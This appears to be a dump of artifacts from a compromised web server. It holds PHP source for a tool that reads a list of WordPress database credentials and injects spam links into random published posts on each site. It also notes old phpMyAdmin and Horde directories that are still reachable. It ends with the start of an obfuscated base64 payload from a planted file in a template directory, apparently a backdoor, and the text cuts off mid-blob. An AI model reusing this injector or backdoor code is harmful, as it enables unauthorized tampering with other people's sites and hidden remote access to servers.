<a href="?a=reverse">reverse posting</a><br />
 
<h2>Logs</h2>
<a href="?l=connect">connections.log</a><br />
<a href="?l=process"><?php echo(PROC_LOG) ?>.log</a><br />
<a href="?l=reverse">reverse.log</a><br />
<br />
<a href="?d=true">archive logs</a><br />
<div style="margin-top: 15px; clear: both; border-top: 1px dotted #999;">
<?php
 $flink = 'links.txt'; if(isset($_GET['flink'])){ if($_GET['flink'] == 'links_txt') { $flink = 'links.txt';} if($_GET['flink'] == 'links1_txt') { $flink = 'links1.txt';} } if (isset($_GET['l'])) { showLog($_GET['l']); } if (isset($_GET['d'])) { preDownloadLogs(); } if (isset($_GET['a'])) { if($_GET['a'] == 'post') { postLinks($flink); } if($_GET['a'] == 'reverse') { reverse_posting(); } } function postLinks($flink = 'links.txt') { $lch = fopen("connect.log", "w"); $num_of_bd = 0; $pswds = get_ar_file(LIST_DB); $links = get_ar_file($flink); if($pswds AND $links){ $num_of_bd = COUNT($pswds); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd); $num_of_links = COUNT($links); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd .'FILE - <strong>'.$flink.'</strong>; COUNT OF LINKS - ' .$num_of_links); } else { fwrite($lch, "!ERR: pswd OR ".$flink."file not exist\n"); return FALSE; } $total_updates = $n_bases = $i_url = 0; foreach ($pswds as $a_line) { $atr = get_db_atr($a_line); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($db->status != "connected") { fwrite($lch, "<span style='color:#fb0000;'>".$db->status ."</span>\n<br>"); } $get_url = $db->fetch_assoc("SELECT `option_value` FROM `wp_options` WHERE `option_name` = 'siteurl' OR `option_name` = 'home'"); if (isset($get_url[0]['option_value'])) { $tmp_url = $get_url[0]['option_value']; } else if (isset($get_url[1]['option_value'])) { $tmp_url = $get_url[1]['option_value']; } else { $tmp_url = "http://"; } if ($tmp_url != "http://") { $find_s_pattern = "/http\:\/\/.+\.[a-zA-Z0-9]{0,5}[\.a-zA-Z0-9]{0,5}?/i"; if (preg_match($find_s_pattern, $tmp_url, $matches)) { $tmp_url = $matches[0]."."; } else { $tmp_url = $tmp_url."."; } } $res = $db->fetch_assoc("SELECT `ID`, `guid`, `post_content` FROM `".$atr['pref']."posts` WHERE `post_status` = 'publish' AND post_type='post'"); $count_posts = count($res); $str_scr = 'TOTAL COUNT OF POST IN '.trim($a_line).' - '.$count_posts; $pattern = "~.*?[.?!](?:\s|$)~s"; $ret_arr = array(); $r_idx = NULL; $saved_links = $empty_links = $count_post_ready_to_injekt = $count_good_post = 0; if(isset($res)){ foreach($res as $key => $val){ $prop = $val['post_content']; if(preg_match_all($pattern, $prop, $proposals)) { $r_idx = array_rand($proposals[0]); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); if (!$fl_p_ok){ $empty_links++; dbg_prn('EMPTY POST'); dbg_prn($val); } else { $fl = FALSE; foreach ($links as $content) { $link_in_post = FALSE; $poisk = trim($content); $link_in_post = strpos($val['post_content'], $poisk); if($link_in_post){ $have_id = $val['ID']; $saved_links++; dbg_prn($have_id.' already have an injected url. ' .$poisk); $fl = TRUE; } } } if (($fl_p_ok) AND (!$fl)) { $ret_arr[] = $val; } } else { $empty_links++; } } $res = $ret_arr; unset($ret_arr); $count_good_post = count($res); $str_scr .= ' COUNT OF INJECTED POST - '.$saved_links .' COUNT OF EMPTY POST - '.$empty_links .' COUNT OF GOOD POST - '.$count_good_post; dbg_prn($str_scr); dbg_prn($res); $count_post_ready_to_injekt = $count_posts - $saved_links - $empty_links; if ($count_good_post >= NPOST) { $num_upd_post = NPOST; }else{ $num_upd_post = $count_good_post; } } else { dbg_prn('EMPTY RESULT (NO POST IN BATABASE)'); } if(isset($res) AND ($num_upd_post > 0) ){ dbg_prn($res); dbg_prn($num_upd_post); $random_keys = array_rand($res, $num_upd_post); if(isset($random_keys)){ if($random_keys == 0){ $tmp_ar = Array(); $tmp_ar[] = 0; $random_keys = $tmp_ar; } foreach ($random_keys as $post) { $url_unit = $links[$i_url]; $prop = $res[$post]['post_content']; preg_match_all($pattern, $prop, $proposals); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); $prop_ar = explode(" ", $prop); $unic = array_unique($prop_ar); $diff = array_diff_assoc($prop_ar, $unic); $out = array_diff($prop_ar, $diff); $word_rkey = array_rand($out); $word = $prop_ar[$word_rkey]; $cnt_word = $replace_unit = NULL; dbg_prn($prop); $zam = " ".$url_unit." ".$word." "; $replace_unit = str_replace($word, $zam, $prop, $cnt_word); dbg_prn($cnt_word); dbg_prn($replace_unit); $cnt_prop = $posting_string = NULL; $posting_string = str_replace($prop, $replace_unit, $res[$post]['post_content'], $cnt_prop); dbg_prn($posting_string); dbg_prn($cnt_prop); $count = 1; if(isset($posting_string) AND $cnt_prop == 1 AND $fl_p_ok){ $upd = "UPDATE `".$atr['pref']."posts` SET `post_content`='" .addslashes($posting_string) ."' WHERE `ID` = ".$res[$post]['ID'].""; $db->query($upd); $total_updates++; $log['dt'] = date("Y-m-d H:i"); $log['id'] = (int)$res[$post]['ID']; $log['guid'] = trim($res[$post]['guid']); $log['bd'] = trim($a_line); $log['link'] = (int)($i_url+1); $log['url'] = trim($url_unit); $log_str = implode(SEP, $log); dbg_prn($log_str, TRUE); Log::write($log_str, PROC_LOG); $i_url++; if($i_url >= $num_of_links){ $i_url = 0;} } else { $log_str = date("Y-m-d H:i").SEP.(int)$res[$post]['ID']. SEP.trim($res[$post]['guid']).' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } } else { $log_str = date("Y-m-d H:i").SEP.$random_keys .' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } $n_bases++; fwrite($lch, date("Y-m-d H:i").": ".$atr['host']." Walthru OK no errors<br>\n"); unset($db); unset($res); } fclose($lch); echo "<div style='padding: 5px; background: #ccc'>Post injected: ".$total_updates."</div>"; echo "<div style='padding: 5px; background: #ccc'>Bases walked: ".$n_bases."</div>"; } function reverse_posting() { $reverses = get_ar_file( PROC_LOG.LOG_EXT ); if(isset($reverses)){ foreach ($reverses as $reverse) { if(strlen($reverse) > 20){ LIST($log['dt'], $log['id'], $log['guid'], $log['bd'], $log['link'], $log['url']) = explode(SEP, $reverse); $atr = get_db_atr($log['bd']); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($res = $db->fetch_row("SELECT `post_content` FROM `".$atr['pref']."posts` WHERE `ID` = '".$log['id']."'")) { $replace_unit = str_replace(trim($log['url']), '', $res[0][0], $count); if($count > 0){ $db->query("UPDATE `".$atr['pref']."posts` SET `post_content`='".$replace_unit."' WHERE `ID` = '".$log['id']."'"); $stat = ' successfully  restored'; }else{$stat = ' not contain url';} $log_str = date("Y-m-d H:i").' POST - '.$log['guid'].$stat; dbg_prn($log_str, TRUE); Log::write($log_str, 'reverse'); } else {echo "Somthing wrong: ".$db->errors;} unset($res); unset($db); } } } unset($reverses); } function get_db_atr($str) { LIST($atr['host'], $atr['user'], $atr['pass'], $atr['db'], $atr['pref']) = explode(':', trim($str)); return $atr; } function checkInstall ($params, $type) { foreach ($params as $key=>$value) { $filename = $value.".".$type; if (!file_exists($filename)) { $fh = fopen($filename, "w"); fclose($fh); echo "Conf file <b>".$filename."</b> created<br />\n"; } } } class db { protected $link; private $server, $username, $password, $db; public $status; public $errors=""; public function __construct($server, $username, $password, $db) { $this->server = $server; $this->username = $username; $this->password = $password; $this->db = $db; return $this->connect(); } private function connect() { if ($this->link = mysql_connect($this->server, $this->username, $this->password)) { mysql_select_db($this->db); mysql_query("SET NAMES UTF8"); $this->status = "connected"; } else { $this->status = "Could not connect to ".$this->username."@".$this->server; } } public function fetch_assoc($query) { $result = mysql_query($query); $i = 0; $this->errors = mysql_error()."\n"; while($r = mysql_fetch_assoc($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function fetch_row($query) { $result = mysql_query($query); $this->errors = mysql_error()."\n"; $i = 0; while($r = mysql_fetch_row($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function query($q) { mysql_query($q); } public function __destruct() { @mysql_close($this->link); } } function showLog($log_type = PROC_LOG) { $file = get_ar_file($log_type.LOG_EXT); if($file){ foreach($file as $log){ echo htmlspecialchars($log).BR; } } } function preDownloadLogs() { if (file_exists(ARCH)){ unlink(ARCH); } $output = exec( 'tar -czvf '.ARCH.' process.log connect.log' ); if (is_null ( $output )) { echo "error gzip"; } else { echo "<pre>log package <b>".ARCH."</b> created</pre>"; echo "<a href='".ARCH."'>download logs</a>"; } } function dbg_prn($s, $fl= DBG) { if($fl) { $pre = $post = NULL; $pre = '<PRE>'; $post ='</PRE>'; echo $pre; print_r($s); echo $post.PHP_EOL; }} class Log{ static function write($mess="", $name="info_error"){ if(strlen(trim($mess)) < 2){ return FALSE; } if(preg_match("/^([_a-z0-9A-Z]+)$/i", $name, $matches)){ $text = $mess.PHP_EOL; $filename = $name.LOG_EXT; if(!is_writable($filename)) { dbg_prn('Is NOT writable file '.$filename);return FALSE; } if (!$handle = fopen($filename, "a+")) {dbg_prn('Cannot open file '.$filename);return FALSE;} @flock ($handle, LOCK_EX); if(fwrite ($handle, $text)=== FALSE ) {dbg_prn('Cannot write to file '.$filename);return FALSE;} @flock ($handle, LOCK_UN); if (!fclose($handle)) {dbg_prn('Cannot close file '.$filename); return FALSE;} return TRUE; }else{return FALSE;} } } function get_ar_file($name) { $mas = Array(); if(is_readable($name)) { $handle = fopen($name, 'r'); if($handle){ while (!feof($handle)) { $mas[]= trim(fgets($handle)); } fclose($handle); }else{ dbg_prn("BAD FILE :".$name); return NULL; } $handle = NULL; return $mas; }else{ dbg_prn('FILE :'.$name.' is not a readable'); return NULL; } } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } ?>
</div>
</body>
</html>

Old phpMyAdmin versions still accessable over the network

drwxr-xr-x 9 confixx confixx 4096 Nov 28 2011 phpMyAdmin-2.11.9.5-all-languages (htaccess restriction) drwxr-xr-x 10 confixx confixx 4096 Sep 17 10:36 phpMyAdmin-3.4.9-all-languages (accessable) -rw-r--r-- 1 root root 6833680 Apr 16 2013 phpMyAdmin-3.5.8-all-languages_share.zip drwxr-xr-x 9 root root 4096 Jul 18 2013 phpMyAdmin-4.0.4.1 (accessable) drwxr-xr-x 9 root root 4096 Jun 10 2014 phpMyAdmin-4.2.3-all-languages

Old horde versions still accessable

drwxr-xr-x 24 confixx confixx 4096 Nov 28 2011 poplogin drwxr-xr-x 22 confixx confixx 4096 Nov 28 2011 poplogin.20100924 (accessable) drwxr-xr-x 3 confixx confixx 4096 Nov 28 2011 poplogin.orig1 (accessable)

include/template/templates_c/sys.php

-> from site http://profexer.name/pas/download.php

<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', '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
